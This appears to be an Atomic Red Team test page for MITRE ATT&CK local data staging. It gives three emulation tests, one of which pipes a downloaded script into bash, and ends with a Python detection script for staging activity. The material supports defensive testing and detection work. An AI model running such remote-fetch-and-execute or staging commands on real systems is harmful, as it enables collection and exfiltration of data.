# T1074.001 - Local Data Staging

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

## Atomic Tests

## Atomic Test #1 - Stage data from Discovery.bat

Use PowerShell to download Discovery.bat and save it to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.

**Supported Platforms:** Windows

**Inputs:**

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat |

**Attack Commands:** Run with `powershell`!

```powershell
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}
```

**Cleanup Commands:**

```powershell
Remove-Item -Force #{output_file} -ErrorAction Ignore
```


## Atomic Test #2 - Stage data from Discovery.sh

Use curl to download Discovery.sh and execute a basic information-gathering shell script, redirecting its output to a local file.

**Supported Platforms:** Linux, macOS

**Inputs:**

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save the output of the downloaded discovery.sh script | Path | /tmp/T1074.001_discovery.log |

**Attack Commands:** Run with `bash`!

```bash
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}
```


## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp

Use living-off-the-land tools to zip a folder and stage it in the Windows temporary folder for later exfiltration. Upon execution, verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.

**Supported Platforms:** Windows

**Inputs:**

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip |
| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip |

**Attack Commands:** Run with `powershell`!

```powershell
Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```

**Cleanup Commands:**

```powershell
Remove-Item -Path #{output_file} -ErrorAction Ignore
```
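One way to check whether your telemetry would surface the activity these three tests generate, as an added example that is not part of Atomic Red Team: a small Python scan over constructed command-line records (the hostnames, paths and `example.invalid` URLs are made up) that flags a download, an archive or piped script output landing in a temp or /tmp staging directory, while ignoring the same commands writing elsewhere.

```python
import re

# Constructed sample telemetry (not real Atomic Red Team output): one record per
# line, "source|host|command_line", roughly the shape of Sysmon Event ID 1 / auditd.
SAMPLE_EVENTS = """\
ps|win01|powershell.exe Invoke-WebRequest "https://example.invalid/Discovery.bat" -OutFile C:\\Users\\u\\AppData\\Local\\Temp\\discovery.bat
ps|win01|powershell.exe Compress-Archive -Path C:\\Users\\u\\Documents\\Folder_to_zip -DestinationPath C:\\Users\\u\\AppData\\Local\\Temp\\Folder_to_zip.zip -Force
ps|win02|powershell.exe Compress-Archive -Path C:\\Build\\out -DestinationPath C:\\Build\\out.zip
sh|lnx01|bash -c "curl -s https://example.invalid/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log"
sh|lnx02|bash -c "curl -s https://example.invalid/health | grep ok"
"""

# Directories commonly used as a local staging location (Windows user/system temp, /tmp).
STAGING_DIRS = re.compile(r"(?i)(\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|(^|\s|>)/tmp/)")

# Each rule names the behaviour of one atomic test and captures the destination path.
RULES = [
    ("download_to_temp", re.compile(r"(?i)Invoke-WebRequest\b.*-OutFile\s+(\S+)")),        # Test #1
    ("archive_to_temp", re.compile(r"(?i)Compress-Archive\b.*-DestinationPath\s+(\S+)")),  # Test #3
    ("shell_output_to_tmp", re.compile(r"(?i)curl\b.*\|\s*bash\b.*>\s*(\S+)")),             # Test #2
]


def detect_staging(events: str):
    """Return (host, rule_name, destination) for every record whose destination
    path falls inside a staging directory. Records writing elsewhere are ignored."""
    hits = []
    for line in events.splitlines():
        source, host, cmd = line.split("|", 2)  # maxsplit keeps pipes inside cmd intact
        for name, rx in RULES:
            m = rx.search(cmd)
            if m and STAGING_DIRS.search(m.group(1)):
                hits.append((host, name, m.group(1).strip('"')))
    return hits


if __name__ == "__main__":
    for host, rule, dest in detect_staging(SAMPLE_EVENTS):
        print(f"{host}: {rule} -> {dest}")
```

The two non-flagged records (a build archive outside temp and a curl pipe into grep) show why the destination check matters: the command names alone are too noisy to alert on.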